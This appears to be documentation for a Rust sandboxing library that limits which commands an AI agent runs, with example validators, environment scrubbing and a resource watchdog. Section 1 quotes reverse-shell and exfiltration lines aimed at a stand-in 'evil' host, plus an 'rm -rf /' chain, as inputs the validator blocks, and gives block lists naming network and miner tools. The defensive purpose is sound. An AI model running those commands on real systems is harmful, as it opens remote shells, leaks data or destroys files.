
1. Command Whitelist

Only approved binaries execute. More than 50 binaries are permanently blocked, including network tools, crypto miners, compilers, package managers, and system tools. 32 safe binaries are allowlisted by default (ls, cat, git, echo, diff, and others).
use laminae::ironclad::validate_binary;

validate_binary("git")?;   // OK
validate_binary("ssh")?;   // Error: permanently blocked
Deep command validation catches piped commands, subshells, and reverse shells:
use laminae::ironclad::validate_command_deep;

validate_command_deep("echo test | ssh user@evil.com")?;  // BLOCKED
validate_command_deep("bash -i >& /dev/tcp/evil/4444")?;  // BLOCKED
validate_command_deep("ls -la | sort | uniq")?;            // OK
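The allowlist only holds if the check sees every binary a command line would actually run, not just the first word. The following is an added example, not laminae's code: a standalone Rust validator that splits a command line at pipes, `&&`/`||`/`;`, subshells and `$( )`, checks each simple command's binary against a permanent block list and an allowlist, and additionally rejects `/dev/tcp` redirections, inline `LD_PRELOAD=` style overrides, and binaries hidden behind `env`/`nice`/`xargs`. The block list, allowlist and wrapper list are constructed subsets for illustration; the function names mirror the page's but the signatures (an explicit `allow` set, `Result<(), String>`) are assumptions.

```rust
use std::collections::HashSet;

// Constructed subsets of the page's block list and allowlist, for this example only.
const PERMANENT_BLOCK: &[&str] = &["ssh", "nc", "ncat", "curl", "wget", "gcc", "apt", "pip", "xmrig"];
const DEFAULT_ALLOW: &[&str] = &["ls", "cat", "git", "echo", "diff", "sort", "uniq", "grep", "wc"];
// Wrappers that exec their argument: the real binary is the next non-flag token.
const WRAPPERS: &[&str] = &["env", "nice", "nohup", "time", "xargs"];

pub fn default_allowlist() -> HashSet<&'static str> {
    DEFAULT_ALLOW.iter().copied().collect()
}

/// A permanent block wins over the allowlist; anything not allowlisted is rejected.
pub fn validate_binary(bin: &str, allow: &HashSet<&str>) -> Result<(), String> {
    if PERMANENT_BLOCK.contains(&bin) {
        return Err(format!("{bin}: permanently blocked"));
    }
    if !allow.contains(bin) {
        return Err(format!("{bin}: not in allowlist"));
    }
    Ok(())
}

/// Split a command line into simple commands at `|`, `||`, `&&`, `;`, newlines,
/// subshells `( )`, `$( )` and backticks. Quoted text stays one token; `>&` and
/// `&>` are kept as redirection tokens rather than read as a background `&`.
fn split_segments(cmd: &str) -> Vec<Vec<String>> {
    let mut segs: Vec<Vec<String>> = vec![Vec::new()];
    let (mut tok, mut quote) = (String::new(), None::<char>);
    let mut chars = cmd.chars().peekable();
    while let Some(c) = chars.next() {
        let (end_tok, end_seg) = match quote {
            Some(q) if c == q => { quote = None; (false, false) }
            Some(_) => { tok.push(c); (false, false) }
            None => match c {
                '\'' | '"' => { quote = Some(c); (false, false) }
                '&' if tok.ends_with('>') || chars.peek() == Some(&'>') => { tok.push(c); (false, false) }
                '$' if chars.peek() == Some(&'(') => { chars.next(); (true, true) }
                '|' | '&' | ';' | '\n' | '(' | ')' | '`' => (true, true),
                c if c.is_whitespace() => (true, false),
                _ => { tok.push(c); (false, false) }
            },
        };
        if end_tok && !tok.is_empty() {
            segs.last_mut().unwrap().push(std::mem::take(&mut tok));
        }
        if end_seg {
            segs.push(Vec::new());
        }
    }
    if !tok.is_empty() {
        segs.last_mut().unwrap().push(tok);
    }
    segs.into_iter().filter(|s| !s.is_empty()).collect()
}

/// Tokens a redirection consumes: 2 for a bare operator (`>`, `>&`, `2>`) whose target
/// is the next token, 1 when the target is attached (`2>&1`, `>/dev/null`), else None.
fn redirect_len(tok: &str) -> Option<usize> {
    let s = tok.trim_start_matches(|c: char| c.is_ascii_digit() || c == '&');
    let rest = s.strip_prefix(|c: char| c == '<' || c == '>')?;
    let rest = rest.trim_start_matches(|c: char| c == '<' || c == '>' || c == '&');
    Some(if rest.is_empty() { 2 } else { 1 })
}

/// `NAME=value` prefix, as in `LD_PRELOAD=/tmp/x.so ls`.
fn is_assignment(tok: &str) -> bool {
    let name = match tok.split_once('=') { Some((n, _)) => n, None => return false };
    let mut it = name.chars();
    it.next().map_or(false, |c| c.is_ascii_alphabetic() || c == '_')
        && it.all(|c| c.is_ascii_alphanumeric() || c == '_')
}

pub fn validate_command_deep(cmd: &str, allow: &HashSet<&str>) -> Result<(), String> {
    for seg in split_segments(cmd) {
        // bash opens a socket for /dev/tcp/<host>/<port>: the classic reverse-shell idiom.
        if let Some(t) = seg.iter().find(|t| t.contains("/dev/tcp/") || t.contains("/dev/udp/")) {
            return Err(format!("network redirection to {t}"));
        }
        let (mut i, mut after_wrapper) = (0, false);
        while i < seg.len() {
            let tok = seg[i].as_str();
            let bin = tok.rsplit('/').next().unwrap_or(tok);
            if let Some(n) = redirect_len(tok) {
                i += n;
            } else if is_assignment(tok) {
                // An inline loader override would hijack an otherwise allowed binary.
                if tok.starts_with("LD_") || tok.starts_with("DYLD_") {
                    return Err(format!("loader variable override: {tok}"));
                }
                i += 1;
            } else if after_wrapper && tok.starts_with('-') {
                i += 1; // wrapper flag (a flag with a separate value fails closed on that value)
            } else if WRAPPERS.contains(&bin) {
                after_wrapper = true;
                i += 1;
            } else {
                // Only the basename is checked; the sandbox must also pin PATH so a
                // same-named binary elsewhere cannot be resolved instead.
                validate_binary(bin, allow)?;
                break;
            }
        }
    }
    Ok(())
}
```

The point of the segment split is that `validate_binary` runs once per simple command, so `echo test | ssh host`, `ls $(nc -e /bin/sh evil 4444)` and `git status && rm -rf /` all fail on the second binary. Quoted strings are deliberately opaque (`echo 'a | ssh h'` is allowed), which is why shells themselves must stay off the allowlist: `bash -c "..."` would otherwise reintroduce everything the parser removed.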

2. Platform-Native Sandbox

| Platform | Provider | Mechanism |
|---|---|---|
| macOS | SeatbeltProvider | sandbox-exec with SBPL profiles |
| Linux | LinuxSandboxProvider | PR_SET_NO_NEW_PRIVS, network namespaces, rlimits |
| Windows | WindowsSandboxProvider | Working directory restriction, env scrubbing |
| Other | NoopProvider | Environment scrubbing only |
use laminae::ironclad::sandboxed_command;

let mut cmd = sandboxed_command("git", &["status"], "/path/to/project")?;
let child = cmd.spawn()?;
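The two mechanisms every provider in the table shares are environment scrubbing and working-directory restriction, and on Linux the page names `PR_SET_NO_NEW_PRIVS`. The following added example (not laminae's implementation) builds a `std::process::Command` the same way: the child's environment starts empty and receives only an allowlisted subset plus a fixed `PATH`, the working directory is canonicalized and refused if it resolves outside the project root, and on Linux a `pre_exec` hook sets `PR_SET_NO_NEW_PRIVS` before `exec`. The `KEEP` list, `SAFE_PATH`, and the function signatures are assumptions for this example.

```rust
use std::collections::BTreeMap;
use std::path::{Path, PathBuf};
use std::process::Command;

// Only these variables pass through (constructed list). Everything else, including
// LD_PRELOAD / DYLD_INSERT_LIBRARIES, BASH_ENV, PROMPT_COMMAND and whatever
// *_TOKEN or *_SECRET the agent host carries, is dropped because it is not listed.
const KEEP: &[&str] = &["HOME", "LANG", "LC_ALL", "TERM", "USER"];
// PATH is always replaced so a PATH=/tmp/bin:... in the parent cannot shadow `git`.
const SAFE_PATH: &str = "/usr/bin:/bin";

/// Allowlist-based scrub of the inherited environment.
pub fn scrub_env<'a>(inherited: impl IntoIterator<Item = (&'a str, &'a str)>) -> BTreeMap<String, String> {
    let mut out: BTreeMap<String, String> = inherited
        .into_iter()
        .filter(|(k, _)| KEEP.iter().any(|keep| keep == k))
        .map(|(k, v)| (k.to_string(), v.to_string()))
        .collect();
    out.insert("PATH".to_string(), SAFE_PATH.to_string());
    out
}

/// Resolve `requested` relative to `root` and refuse anything that ends up outside
/// it. canonicalize() follows symlinks, so `src -> /etc` is caught as well as `..`.
pub fn confine_dir(root: &Path, requested: &Path) -> Result<PathBuf, String> {
    let root = root.canonicalize().map_err(|e| format!("root {}: {e}", root.display()))?;
    let dir = root
        .join(requested)
        .canonicalize()
        .map_err(|e| format!("cwd {}: {e}", requested.display()))?;
    if !dir.starts_with(&root) {
        return Err(format!("{} is outside {}", dir.display(), root.display()));
    }
    Ok(dir)
}

/// Build the restricted command; spawning is left to the caller.
pub fn sandboxed_command<'a>(
    program: &str,
    args: &[&str],
    root: &Path,
    cwd: &Path,
    inherited: impl IntoIterator<Item = (&'a str, &'a str)>,
) -> Result<Command, String> {
    let dir = confine_dir(root, cwd)?;
    let mut cmd = Command::new(program);
    // env_clear() first: start from nothing rather than from the parent's environment.
    cmd.args(args).env_clear().envs(scrub_env(inherited)).current_dir(dir);
    #[cfg(target_os = "linux")]
    {
        use std::os::unix::process::CommandExt;
        extern "C" {
            fn prctl(option: i32, ...) -> i32;
        }
        const PR_SET_NO_NEW_PRIVS: i32 = 38;
        // Runs in the child between fork and exec: from here on no setuid/setgid bit
        // or file capability can raise the process's privileges.
        unsafe {
            cmd.pre_exec(|| {
                if unsafe { prctl(PR_SET_NO_NEW_PRIVS, 1u64, 0u64, 0u64, 0u64) } != 0 {
                    return Err(std::io::Error::last_os_error());
                }
                Ok(())
            });
        }
    }
    Ok(cmd)
}

fn main() -> Result<(), String> {
    let root = std::env::current_dir().map_err(|e| e.to_string())?;
    let inherited: Vec<(String, String)> = std::env::vars().collect();
    let mut cmd = sandboxed_command(
        "git",
        &["status"],
        &root,
        Path::new("."),
        inherited.iter().map(|(k, v)| (k.as_str(), v.as_str())),
    )?;
    println!("{cmd:?}");
    let status = cmd.status().map_err(|e| e.to_string())?;
    println!("exit: {status}");
    Ok(())
}
```

Network namespaces and rlimits from the Linux row are not shown here; they belong in the same `pre_exec` hook (an `unshare(CLONE_NEWNET)` and `setrlimit` calls) and need CAP_SYS_ADMIN or user namespaces for the former.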

3. Resource Watchdog

A background monitor polls the child's CPU and memory use and sends SIGKILL (taskkill /F on Windows) when a threshold is violated; the CPU limit has to be exceeded continuously for the configured period before the process is killed, so a short burst does not trigger it.
use laminae::ironclad::{spawn_watchdog, WatchdogConfig};

// `child` is the std::process::Child from sandboxed_command(); Child::id() returns
// the pid directly as a u32, so there is nothing to unwrap.
let cancel = spawn_watchdog(
    child.id(),
    WatchdogConfig::default(),
    "my-agent".into(),
);

// When done, stop the watchdog
cancel.store(true, std::sync::atomic::Ordering::Relaxed);
Default thresholds:

| Resource | Threshold |
|---|---|
| CPU | 90% sustained for 5 minutes |
| Memory | 4 GB |
| Wall time | 30 minutes |
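The part of a watchdog that is easy to get wrong is "sustained": a single sample over 90% must not kill the child, and a dip below the threshold must restart the window. The following added example (not laminae's code) separates that decision logic into a `WatchdogState` that is fed samples, so it can be tested without a real process, and wraps it in a polling thread that returns a cancel flag the way the page's `spawn_watchdog` does. Unlike the page's API, which takes a pid, this version takes a `sample` closure (so the `/proc/<pid>/stat` read is replaceable) and a `kill` closure; those and the field names are assumptions.

```rust
use std::sync::atomic::{AtomicBool, Ordering};
use std::sync::Arc;
use std::thread;
use std::time::{Duration, Instant};

/// Defaults mirror the page's table: 90% CPU for 5 minutes, 4 GB, 30 minutes.
#[derive(Clone, Debug)]
pub struct WatchdogConfig {
    pub cpu_pct: f64,
    pub cpu_sustain: Duration,
    pub max_rss_bytes: u64,
    pub max_wall: Duration,
    pub poll_every: Duration,
}

impl Default for WatchdogConfig {
    fn default() -> Self {
        Self {
            cpu_pct: 90.0,
            cpu_sustain: Duration::from_secs(5 * 60),
            max_rss_bytes: 4 << 30,
            max_wall: Duration::from_secs(30 * 60),
            poll_every: Duration::from_secs(1),
        }
    }
}

#[derive(Debug, PartialEq)]
pub enum Violation {
    CpuSustained,
    Memory(u64),
    WallTime,
}

/// Decision logic, kept apart from the thread so it can be driven by test samples.
pub struct WatchdogState {
    cfg: WatchdogConfig,
    cpu_over_since: Option<Duration>,
}

impl WatchdogState {
    pub fn new(cfg: WatchdogConfig) -> Self {
        Self { cfg, cpu_over_since: None }
    }

    /// Feed one sample taken `elapsed` after spawn. Memory and wall time are hard
    /// limits; CPU has to stay over the threshold for the whole `cpu_sustain`
    /// window, so a short burst (a compile, `git gc`) does not get the child killed.
    pub fn observe(&mut self, elapsed: Duration, cpu_pct: f64, rss_bytes: u64) -> Option<Violation> {
        if elapsed >= self.cfg.max_wall {
            return Some(Violation::WallTime);
        }
        if rss_bytes > self.cfg.max_rss_bytes {
            return Some(Violation::Memory(rss_bytes));
        }
        if cpu_pct < self.cfg.cpu_pct {
            self.cpu_over_since = None; // any dip below the threshold restarts the window
            return None;
        }
        let since = *self.cpu_over_since.get_or_insert(elapsed);
        if elapsed.saturating_sub(since) >= self.cfg.cpu_sustain {
            Some(Violation::CpuSustained)
        } else {
            None
        }
    }
}

/// Background monitor. `sample` returns (cpu_pct, rss_bytes) for the child, or None
/// once it has exited; `kill` runs on the first violation (SIGKILL / taskkill in a
/// real provider). The returned flag stops the monitor, like the page's `cancel`.
pub fn spawn_watchdog<S, K>(cfg: WatchdogConfig, mut sample: S, mut kill: K) -> Arc<AtomicBool>
where
    S: FnMut() -> Option<(f64, u64)> + Send + 'static,
    K: FnMut(Violation) + Send + 'static,
{
    let cancel = Arc::new(AtomicBool::new(false));
    let flag = Arc::clone(&cancel);
    thread::spawn(move || {
        let start = Instant::now();
        let poll = cfg.poll_every;
        let mut state = WatchdogState::new(cfg);
        while !flag.load(Ordering::Relaxed) {
            let (cpu, rss) = match sample() {
                Some(s) => s,
                None => break, // child exited on its own
            };
            if let Some(v) = state.observe(start.elapsed(), cpu, rss) {
                kill(v);
                break;
            }
            thread::sleep(poll);
        }
    });
    cancel
}

fn main() {
    // Constructed sampler standing in for /proc/<pid>/stat reads: RSS grows 1 GiB per poll.
    let mut rss = 0u64;
    let cancel = spawn_watchdog(
        WatchdogConfig { poll_every: Duration::from_millis(10), ..Default::default() },
        move || { rss += 1 << 30; Some((20.0, rss)) },
        |v| println!("would SIGKILL the child: {v:?}"),
    );
    thread::sleep(Duration::from_millis(200));
    cancel.store(true, Ordering::Relaxed);
}
```

Wall time is checked first because it is the one limit that does not depend on a successful sample: if `/proc` reads start failing, a hung child still gets killed once its budget is spent.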

Custom Configuration

use laminae::ironclad::IroncladConfig;

let config = IroncladConfig {
    extra_blocked: vec!["my_dangerous_tool".into()],
    allowlist: vec!["ls".into(), "git".into(), "my_safe_tool".into()],
    whitelisted_hosts: vec!["api.myservice.com".into()],
    ..Default::default()
};